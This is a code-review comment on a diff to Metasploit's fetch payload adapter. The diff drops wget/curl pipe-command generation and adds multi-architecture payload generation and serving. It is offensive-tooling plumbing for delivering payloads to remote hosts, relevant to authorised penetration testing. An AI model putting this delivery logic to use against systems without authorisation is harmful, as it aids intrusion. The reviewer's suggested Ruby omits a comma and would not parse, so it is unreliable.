lib/msf/core/payload/adapter/fetch.rb

```diff
@@ -1,446 +1,558 @@
-        fail_with(Msf::Module::Failure::BadConfig, "Unsupported binary selected for FETCH_PIPE option: #{datastore['FETCH_COMMAND']}, must be one of #{pipe_supported_binaries}.")
+      %w[WGET CURL]
+    end
+
+    def os_arches(meterp_arch)
+      # multiple `uname -m` values map to the same payload arch
+      # we will probably need to expand this
+      case meterp_arch
+      when ARCH_AARCH64
+        return ['aarch64']
+      when ARCH_ARMBE
+        return ['armbe']
+      when ARCH_ARMLE
+        return ['armv5l', 'armv6l', 'armv7l']
+      when ARCH_MIPS64
+        return ['mips64']
+      when ARCH_MIPSBE
+        return ['mipsbe']
+      when ARCH_MIPSLE
+        return ['mips']
+      when ARCH_PPC
+        return ['ppc']
+      when ARCH_PPCE500V2
+        return ['ppce500v2']
+      when ARCH_PPC64LE
+        return ['ppc64le']
+      when ARCH_X64
+        return ['x64', 'x86_64']
+      when ARCH_X86
+        return ['x86']
+      when ARCH_ZARCH
+        return ['zarch']
       end
-      @pipe_cmd = generate_fetch_commands
-      @pipe_cmd << "\n" if windows? #need CR when we pipe command in Windows
-      vprint_status("Command served: #{@pipe_cmd}")
-      cmd = generate_pipe_command
-    else
-      cmd = generate_fetch_commands
-    end
-    vprint_status("Command to run on remote host: #{cmd}")
-    cmd
-  end
+    end
 
-  def generate_pipe_command
-    # TODO: Make a check method that determines if we support a platform/server/command combination
-    @pipe_uri = pipe_srvuri
+    def multi_arches
+      arches = []
+      arches << ARCH_AARCH64
+      arches << ARCH_ARMBE
+      arches << ARCH_ARMLE
+      arches << ARCH_MIPS64
+      arches << ARCH_MIPSBE
+      arches << ARCH_MIPSLE
+      arches << ARCH_PPC
+      arches << ARCH_PPCE500V2
+      arches << ARCH_PPC64LE
+      arches << ARCH_X64
+      arches << ARCH_X86
+      arches << ARCH_ZARCH
+      arches
+    end
 
-    case datastore['FETCH_COMMAND'].upcase
-    when 'WGET'
-      return _generate_wget_pipe
-    when 'CURL'
-      return _generate_curl_pipe
-    else
-      fail_with(Msf::Module::Failure::BadConfig, "Unsupported binary selected for FETCH_PIPE option: #{datastore['FETCH_COMMAND']}, must be one of #{pipe_supported_binaries}.")
+    def generate(opts = {})
+      opts[:arch] ||= module_info['AdaptedArch']
+      if opts[:arch] == ARCH_ANY && module_info['AdaptedPlatform'] == 'linux'
+        # create a hash with all the arches and payloads
+        multi_arches.each do |arch|
+          opts[:arch] = arch
+          @multi_arch = arch
+          vprint_status("Generating payload for #{arch}")
+          opts[:code] = super(opts)
+          # no FETCH_URIPATH support for multi payloads
+          srv_entry = {}
+          srv_entry[:arch] = arch
+          srv_entry[:uri] = default_srvuri(arch.to_s)
+          srv_entry[:payload] = generate_payload_exe(opts)
+          @srv_resources << srv_entry
```

Comment:
```suggestion
          srv_entry = {
            :arch => arch,
            :uri => default_srvuri(arch.to_s)
            :payload => generate_payload_exe(opts)
          }
          @srv_resources << srv_entry
```

I think this is a bit more readable.